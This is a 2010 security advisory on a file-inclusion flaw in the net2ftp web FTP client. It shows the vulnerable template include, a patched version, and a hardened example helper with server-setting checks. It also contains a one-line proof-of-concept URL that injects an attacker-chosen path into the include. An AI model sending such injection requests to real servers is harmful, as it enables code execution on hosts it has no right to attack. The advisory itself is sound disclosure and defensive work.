net2ftp Stable 0.98 RFI/LFI Vulnerability
2010-12-09 15:15:12
net2ftp is a web-based FTP client used by many shared web hosting providers.
////////////////////////////////////////////////////////////////////
The vuln is in file skins/mobile/admin1.template.php, which includes a path taken from $net2ftp_globals without checking that the file was reached through the application itself:
<?php require_once($net2ftp_globals["application_skinsdir"] . "/blue/admin1.template.php"); ?>
///////////////////////////////////////////////////////////////////
Patched Version:
<?php
defined("NET2FTP") or die("Direct access to this location is not allowed.");
require_once($net2ftp_globals["application_skinsdir"] . "/blue/admin1.template.php");
?>
//////////////////////////////////////////////////////////////////
POC:
http://server/skins/mobile/admin1.template.php?net2ftp_globals[application_skinsdir]=evilevilevil
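The PoC works because the template can be requested directly and, with register_globals enabled, a query-string parameter named net2ftp_globals[application_skinsdir] becomes the array element the include reads. The patch above closes the direct-access path with the NET2FTP guard. The following is an added example, not net2ftp's own code, of a guarded include that keeps that guard and additionally confines the skins directory to the application's own tree, so that a remote URL or a traversal path is rejected even if the array was tampered with by some other route. The NET2FTP constant and the $net2ftp_globals array are taken from the advisory; the helper name safe_skin_include and the skins root derived from __DIR__ are assumptions made here.

```php
<?php
// Added example (not net2ftp's own code): guarded template include that
// refuses direct access and validates the skin directory before including.

// 1. Refuse direct HTTP access. The application's front controller is
//    assumed to define NET2FTP before loading templates, so a direct request
//    to this file dies here (this is the check the advisory's patch adds).
defined("NET2FTP") or die("Direct access to this location is not allowed.");

// 2. Do not trust a global array that register_globals (or any other
//    mechanism) could have populated from the request. Resolve the requested
//    directory and require it to lie inside the real skins directory.
function safe_skin_include(array $globals, string $skins_root, string $file): void
{
    $requested = $globals["application_skinsdir"] ?? "";
    $real_root = realpath($skins_root);
    $real_dir  = realpath($requested);   // false for a remote URL or a missing path
    $sep = DIRECTORY_SEPARATOR;
    if ($real_root === false || $real_dir === false
        || strpos($real_dir . $sep, $real_root . $sep) !== 0) {
        // Anything outside the skins tree (http://..., ../ traversal, an
        // unrelated local directory) is rejected before any include happens.
        http_response_code(403);
        die("Invalid skins directory.");
    }
    // basename() strips any directory component from the template name.
    $target = $real_dir . $sep . "blue" . $sep . basename($file);
    if (!is_file($target)) {
        http_response_code(404);
        die("Template not found.");
    }
    require_once $target;
}

// This file lives in skins/mobile/, so the skins root is one level up
// (assumed layout, matching the advisory's path).
safe_skin_include($net2ftp_globals, __DIR__ . "/..", "admin1.template.php");
?>
```

Two checks go with this on a deployed host: confirm that register_globals is off (php -i | grep register_globals; the directive was removed entirely in PHP 5.4), and confirm that allow_url_include is off so that even an unvalidated include cannot fetch a remote file. The realpath() comparison is the defense-in-depth layer that holds if either setting is wrong.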
Fixes
No fixes